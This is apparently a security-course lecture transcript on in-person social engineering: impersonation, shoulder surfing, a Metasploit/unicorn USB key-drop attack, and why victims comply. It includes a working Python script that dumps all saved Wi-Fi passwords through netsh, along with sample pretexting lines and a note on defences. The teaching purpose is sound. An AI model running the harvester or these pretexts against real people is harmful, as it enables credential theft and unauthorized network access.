Skill Level Intermediate
The social engineering attacks that we've discussed so far all depend on technical aspects. In other words, we've looked at ways that we can send messages to and contact people using technical means. But there's another whole aspect to social engineering in which you're actually closer to the person, and sometimes actually in person with the potential victim. So let's talk about some of the different types of social engineering attacks that you can carry out when you're in closer proximity.
Elicitation is one type of attack, or in a way one type of pre-attack, and it's basically asking authorized users for information about a system, an environment, or people. Now, you can conduct elicitation remotely using email or messages, or you can just talk to someone in person. The things you might want to get from an authorized user may be something simple, like: what is the format of your internal email addresses? Do you use first name dot last name, or last name with a first initial, or whatever the format is? If you can just kind of ask somebody, you can get a lot of information about potential email lists or internal information that you can use to compromise that system.
So you want to collect information as if you were the insider, by talking to someone who is an insider or an authorized user. You can also use interrogation. Interrogation is conducting an informal interview; generally it's informal, but you've already developed the questions you're going to ask someone to get specific responses. So you basically want to conduct, or engage in, a conversation that is directed toward getting more information back from the target.
And of course, one of the favorite types of in-person social engineering attacks is impersonation. Impersonation is where you either walk in or call the potential victim and pretend to be someone of authority. The most common way to do this is to pretend to be part of IT or the support desk, and in order to complete your job you need more information, which is the pretext for the questioning. For example, you may say, "This is tech support, we've detected malware on your machine, give me your password and we'll clear it up for you," something like that.
Of course it needs to be more sophisticated, but that gives you an idea of what you might be able to do. If you don't want to go that route, and you also want to get more information, specifically things like usernames and passwords, one effective mechanism is shoulder surfing. Now, we did talk about grabbing somebody's PIN when they swipe a card at an ATM; we talked about virtual shoulder surfing using a camera. But you can literally stand behind somebody and watch how they type, and you can see them type their password, and that's another example of shoulder surfing.
And shoulder surfing is not just for recovering or divulging passwords; it's also for looking at what the user is doing. Perhaps the user is viewing confidential information, and just by watching what they're doing you can gather information to which you're not privy, something you're not authorized to view. In fact, if you ever have an opportunity to walk into a very secure facility, such as CIA headquarters, and walk into one of the rooms where analysts are working on computers, you will of course have a badge that identifies you as a visitor, and if you do not have proper clearance, as you walk into that office area all of the screens close around you will blank out, because there are RFID readers that communicate that the person holding this badge does not have the authority to view what's on the screen right now, and the screen goes blank.
It's kind of annoying if you're an analyst and all of a sudden your screen goes blank and you have to wait for somebody to walk by, but that is a way of ensuring that there's no shoulder surfing going on, because it is a real problem. Another way we can use in-person social engineering is not truly in person, but you're using a physical device to pass from one person to another: it's called a USB key drop. USB keys are devices we use all the time: just a little USB stick, you pop it into the USB port, and we use it to transfer files and all kinds of things. In fact, you can make them auto-boot, so when you insert one into a new machine, if the auto-run feature is enabled, it will actually run whatever software is there, whether it's good software or bad software.
So it's possible to place weaponized USB keys in places where unsuspecting users are likely to pick them up. The way you do this is to put them in places where people may think, "Oh, I found something that's valuable." We've seen USB key drops work very, very well when you take a bunch of them and sprinkle them around a parking lot, or the part of a parking lot in a large office complex where people tend to walk to the front door to go to work. If you sprinkle those around early in the morning, chances are somebody will recognize one, pick it up, and put it in their pocket.
The first thing they do when they sit down at their desk is think, "Hmm, I wonder what's on this," and they'll plug it into the computer, and if you have weaponized auto-run functionality, then their computer will likely be compromised at that point, or infected with whatever you put on it. It's extremely common for people to want to insert a USB key to see what's on it, and that is your attack vector. So let's take a look. I ran across this really cool USB key drop attack, so I want to show it to you. We're not going to go through all the steps; it's a big, long series of steps, but it's important enough and cool enough that I wanted to point it out and show you how a real attack may occur.
So here is a website, again one that I ran across, and it's basically how to hack WPA2 Wi-Fi passwords using Jedi mind tricks. Well, the idea really is just social engineering and a USB dead drop. If you go to the URL that you see on your screen, you can read the whole article. What this does is take a series of USB keys; really you only need one for it to work, but you typically would buy a bunch of these and then sprinkle them around different places.
According to the author, you can buy them all over the place, 16 GB or larger, for just a few dollars. You're going to use Metasploit to actually set up the exploit. The unicorn repository is a framework for creating payloads, infected payloads where you decide what happens when they automatically run and load into memory. So you clone the unicorn repository and use unicorn to create this payload. There are different types of payload you can use, and the one they've chosen will create a reverse UDP connection to the attacker's IP address, so basically it automatically connects the victim machine to the attacker machine.
You save the payload, then you download some Star Wars images and icons. The idea behind this one is that when the user puts the USB key into their computer, they'll see Star Wars pictures and hopefully click on one of them. So we'll see something like this: just pictures from Star Wars. They tell you how to convert the images to icons and then make the icons executable. B2E is an executable that turns graphics into executables. Then you convert the payload to an executable using the program you just downloaded, change the file extensions, and start Metasploit. At that point Metasploit is listening for the connections, and all you have to do is label and drop the USB sticks, and that's it.
To label and drop the USB sticks, you put them somewhere someone is likely to pick them up, and then you wait. All the victim has to do is insert that USB stick into their computer; the auto-load program will load, create a connection back to your machine, and dump their Wi-Fi passwords onto your machine. That is a very convenient way to steal Wi-Fi passwords using a USB key drop.
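The lecture and the linked article only say that the payload "dumps the Wi-Fi passwords"; the following is an added example (not code from the lecture, the article, unicorn or Metasploit) showing what that step actually consists of on a Windows victim. Windows keeps saved Wi-Fi profiles, and `netsh wlan show profile name=<ssid> key=clear` prints the stored pre-shared key, which is why a single executable that the user double-clicks is enough to harvest every network the machine has ever joined. The example assumes en-US `netsh` output; the SSIDs and keys are constructed so the parsing can be exercised offline, and the real `netsh` call is only made on Windows.

```python
"""
Added example: what a "dump the saved Wi-Fi passwords" payload does.
Assumptions: en-US `netsh wlan` output format; constructed SSIDs/keys.
On some Windows builds reading the key may require an elevated prompt.
"""
import re
import subprocess
import sys
from typing import Callable, Dict, List, Optional

# Constructed sample of `netsh wlan show profiles` (not real data).
SAMPLE_PROFILE_LIST = """\
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : CorpGuest
    All User Profile     : HomeNet
    All User Profile     : AirportFree
"""

# Constructed sample of `netsh wlan show profile name=<ssid> key=clear`,
# trimmed to the lines the parser cares about (not real data).
SAMPLE_PROFILE_DETAILS: Dict[str, str] = {
    "CorpGuest": """\
Profile CorpGuest on interface Wi-Fi:
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : Guest2023!
""",
    "HomeNet": """\
Profile HomeNet on interface Wi-Fi:
    Authentication         : WPA2-Personal
    Security key           : Present
    Key Content            : correct horse battery staple
""",
    "AirportFree": """\
Profile AirportFree on interface Wi-Fi:
    Authentication         : Open
    Security key           : Absent
""",
}

PROFILE_RE = re.compile(r"^\s*All User Profile\s*:\s*(.+?)\s*$", re.M)
KEY_RE = re.compile(r"^\s*Key Content\s*:\s*(.+?)\s*$", re.M)


def parse_profile_names(listing: str) -> List[str]:
    """Return the saved SSIDs from `netsh wlan show profiles` output."""
    return PROFILE_RE.findall(listing)


def parse_key(detail: str) -> Optional[str]:
    """Return the cleartext PSK from a `key=clear` dump, or None when the
    profile is an open network or no key line is present."""
    m = KEY_RE.search(detail)
    return m.group(1) if m else None


def netsh_runner(args: List[str]) -> str:
    """Run a real `netsh wlan ...` command (Windows only)."""
    proc = subprocess.run(["netsh", "wlan", *args], capture_output=True,
                          text=True, check=False)
    return proc.stdout


def sample_runner(args: List[str]) -> str:
    """Stand-in for netsh that answers from the constructed samples."""
    if args[:2] == ["show", "profiles"]:
        return SAMPLE_PROFILE_LIST
    ssid = args[2].split("=", 1)[1]          # args[2] is "name=<ssid>"
    return SAMPLE_PROFILE_DETAILS.get(ssid, "")


def dump_saved_wifi(run: Callable[[List[str]], str] = netsh_runner) -> Dict[str, Optional[str]]:
    """Map every saved SSID to its stored PSK (None if no key is stored).
    `run` is injected so the same logic works against sample text."""
    result: Dict[str, Optional[str]] = {}
    for ssid in parse_profile_names(run(["show", "profiles"])):
        detail = run(["show", "profile", f"name={ssid}", "key=clear"])
        result[ssid] = parse_key(detail)
    return result


if __name__ == "__main__":
    run = netsh_runner if sys.platform == "win32" else sample_runner
    for ssid, key in dump_saved_wifi(run).items():
        print(f"{ssid}: {key if key else '<no stored key>'}")
```

Two practical points this makes visible. First, nothing here needs an exploit: the keys are readable by code running as the logged-in user, so the whole attack reduces to getting the user to run something, which is why the article dresses the payload up as Star Wars icons. Second, Windows has not honoured AutoRun for ordinary USB flash drives since Windows 7 (and patched XP/Vista), so on a current machine the "auto-run" path the lecture describes does not fire by itself; the drop only works if the victim double-clicks the disguised executable, and a defender's best levers are blocking unsigned executables from removable media and disabling USB mass storage where it is not needed.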
So why is it that social engineering attacks work so well? They seem fairly easy, and there are so many different types out there. The reason they work so well is that they depend on the overall innate goodness of people. So a good social engineering attack should contain as many of the motivation aspects as possible, including authority, scarcity, social proof, urgency, likeness, and fear.
Now, think about the last phishing email you received; it probably contained a lot of these. Authority: it probably came from someone with authority, perhaps a Nigerian prince, but somebody that has some authority, maybe an FBI agent, a CIA agent, or somebody that supposedly has more power than you do. Scarcity: the idea behind most social engineering attacks is that there's something needed that only you have, and it's valuable.
Social proof: there's typically back and forth to prove that yes, there's value in what I'm providing to you or what I'm asking you for, and value in what you have, and it's important. Urgency means you've got to do this really fast; if you wait, the window will pass and something bad will likely happen. Likeness: most phishing attacks, and any type of social engineering attack, try to develop some sort of rapport so that you feel comfortable and it's not like a stranger is asking you for something.
And lastly, somewhat in contradiction to likeness and developing a rapport, is fear. That goes along with urgency: if you don't do this right now for me, something bad will happen to me or to you. So those are many of the motivation techniques used in social engineering, and you'll find them present in most social engineering attacks. But the bottom line is, people want to be accepted and valued by others, so when an attacker reaches out and strokes that desire, there's a very high probability that at least one of the victims will respond in the way the attacker wants.